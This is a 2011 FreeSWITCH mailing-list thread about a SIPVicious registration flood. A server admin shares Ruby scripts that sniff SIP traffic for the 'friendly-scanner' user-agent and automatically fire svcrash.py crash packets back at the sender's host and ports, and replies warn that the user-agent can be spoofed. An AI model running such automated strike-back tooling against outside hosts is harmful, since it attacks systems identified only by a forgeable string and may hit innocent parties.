[Freeswitch-users] SPIT attack and how to strike back

Peter Steinbach lists at telefaks.de
Fri Apr 22 00:33:13 MSD 2011


In this case, just change the below code to

search="your custom string"

As usually your external gateways like Asterisk should connect through
port 5080 to Freeswitch, you should even be able to identify Sipvicious
with an Asterisk UserAgent string on port 5060.

Best regards
Peter


Kerem Erciyes schrieb:
> That would work until attacker defines a custom user-agent string.
> There has been reports of modified SipVicious code using Asterisk PBX
> as the agent.
>
> On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com
> <mailto:denisgalvao at gmail.com>> wrote:
>
>     Nice! Thanks for sharing!
>
>     Denis
>
>     2011/4/20, Peter P GMX <Prometheus001 at gmx.net
>     <mailto:Prometheus001 at gmx.net>>:
>     > Hello all,
>     >
>     > I would like to share this with you as you may have also been
>     affected
>     > by this threat.
>     >
>     > Yesterday we received a SPIT attack to our Freeswitch servers.
>     We had
>     > about 50 register requests/sec. We noticed this as we saw a slight
>     > increase in the load of the Freeswitch servers. Fortunately
>     Freeswitch
>     > can handle a huge amount of register requests so we had no denial of
>     > service.
>     >
>     > You can identify this attack by finding the following in the
>     Register
>     > message:
>     >     User-Agent: friendly-scanner
>     >
>     > How to get rid of it:
>     > The attacker used Sipvicious (friendly-scanner). Sipvicious
>     itself has a
>     > nice tool "svcrash.py" wich can send a malformed packet back to the
>     > attacker which crashes their own Sipvicious tool. You can issue
>     this tool by
>     >   python svcrash.py -d <host of attacker> -p <port of attacker>
>     > You will need port 5060 on your machine to work. But there is also a
>     > workaround for that. svcrash.py will show how to overcome this
>     if your
>     > port 5060 is not available.
>     > Download it here
>     > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
>     > unpack it to a folder of your choice.
>     >
>     > I wrote a small Ruby script to send the packet back to a port
>     range, as
>     > our attacker used some dozens of ports to send.
>     > Here is the script (Install ruby first by "apt-get install ruby"
>     e.g. on
>     > Debian based systems). Put it into the sipvicious directory
>     > kill_ports.rb:
>     >
>     > #!/usr/bin/env ruby
>     > host=ARGV[0]
>     > start_port=ARGV[1].to_i
>     > end_port=ARGV[2].to_i
>     > start_port.upto(end_port) do |port|
>     >   cmd="python svcrash.py -d #{host} -p #{port}"
>     >   p cmd
>     >   erg=`#{cmd}`
>     >   p erg
>     > end
>     >
>     > You now can run it by
>     > ./kill_ports.rb <ip> <from_port> <to_port>
>     >
>     > By using this tool we got rid of most of the SPIT messages. But
>     after a
>     > while they started again to attack us from different ports.
>     >
>     > The next step is: Why not automate this by trying to identify
>     host and
>     > port automatically and send back the svcrash.py packet to the
>     sender's port?
>     >
>     > First install the pcap library
>     >     apt-get install libpcap-dev libpcap-ruby
>     >
>     > Then I wrote the following tool to automate this, it makes use
>     of the
>     > kill_ports.rb above:
>     > strike_back.rb:
>     >
>     > #!/usr/bin/env ruby
>     > # I used some code from http://snippets.dzone.com/posts/show/5931
>     > require 'pcaplet'
>     > require 'logger'
>     > require 'timeout'
>     > @timeout=3600 # max runtime: 1 hour
>     >
>     > @logfile='strike_back.log'
>     > class AuditLogger < Logger
>     >   def format_message(severity, timestamp, progname, msg)
>     >     puts msg
>     >     "#{msg}\n"
>     >   end
>     > end
>     >
>     > logfile = File.open(@logfile, 'a')
>     > LOGGER = AuditLogger.new(logfile)
>     > LOGGER.level = Logger::INFO
>     > search="friendly-scanner"
>     > puts"Searching for '#{ search}' in SIP packets"
>     > $network = Pcaplet.new('-s 1500')
>     > $filter = Pcap::Filter.new('udp and dst port 5060',
>     $network.capture)
>     > $network.add_filter($filter)
>     > puts "Logfile: #{@logfile}"
>     > puts "Starting capture..."
>     > begin
>     >   Timeout.timeout(@timeout) do # 3600 sec
>     >     for p in $network
>     >         header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}
>     > #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
>     >         if $filter =~ p
>     >             #puts "simple search"
>     >             if p.udp_data.index(search)
>     >               LOGGER.info "Kill Friendly scanner #{p.src} with
>     Source
>     > Port #{p.sport}"
>     >               cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
>     >               erg=`#{cmd}`
>     >               p erg
>     >               LOGGER.info header
>     >               LOGGER.info p.udp_data
>     >             end
>     >         end
>     >     end
>     >   end
>     > rescue Timeout::Error
>     >   logfile.flush
>     >   puts "Timeout - finished."
>     > end
>     >
>     > There may be a better way to code this, but at least it worked.
>     After
>     > about 15min the number of attacks went to 0.
>     >
>     > Disclaimer: You can damage other systems by using these tools. So be
>     > carefull and use at your own risks. Do not use this tool for
>     attacking
>     > other systems!
>     >
>     > Best regards
>     > Peter
>     >
>     > _______________________________________________
>     > FreeSWITCH-users mailing list
>     > FreeSWITCH-users at lists.freeswitch.org
>     <mailto:FreeSWITCH-users at lists.freeswitch.org>
>     > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>     >
>     UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
>     > http://www.freeswitch.org
>     >
>
>     --
>     Enviado do meu celular
>
>     _______________________________________________
>     FreeSWITCH-users mailing list
>     FreeSWITCH-users at lists.freeswitch.org
>     <mailto:FreeSWITCH-users at lists.freeswitch.org>
>     http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>     UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
>     http://www.freeswitch.org
>
>
>
>
> -- 
> Kerem Erciyes - Sistem Danismani
> http://keremerciyes.com
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
>   


-- 
With kind regards
Peter Steinbach 

Telefaks Services GmbH
mailto:lists (att) telefaks.de
Internet: www.telefaks.de





More information about the FreeSWITCH-users mailing list